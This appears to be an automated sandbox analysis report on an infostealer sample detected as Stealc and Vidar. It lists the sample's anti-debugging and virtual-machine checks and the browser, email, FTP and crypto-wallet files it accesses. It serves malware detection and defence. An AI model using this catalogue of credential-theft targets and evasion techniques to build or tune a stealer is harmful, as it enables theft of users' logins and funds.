Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0036DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0036DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0036E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0036E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0036BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0036BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0036F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0036F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00373EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00373EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003616D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_003738B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0036ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0036ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00374570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00374570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0036DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0036DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00361160 GetSystemInfo,ExitProcess,

0_2_00361160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1951143669.0000000001178000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1951143669.000000000112E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1951143669.0000000001187000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW!

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-14723
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13536
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13533
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13551
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13547
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13587

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003645C0 VirtualProtect ?,00000004,00000100,00000000

0_2_003645C0

Source: C:\Users\user\Desktop\file.exe

0_2_00379860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00379750 mov eax, dword ptr fs:[00000030h]

0_2_00379750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00377850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00377850

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00379600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00379600

Source: file.exe, file.exe, 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: oProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00377B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00376920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00376920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00377850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00377850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00377A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00377A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1951143669.000000000112E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1723190481.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe, 00000000.00000002.1951143669.0000000001187000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: n\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Led
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: ltiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.js
Source: file.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.v

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1951143669.000000000112E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1723190481.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	335 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	641 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
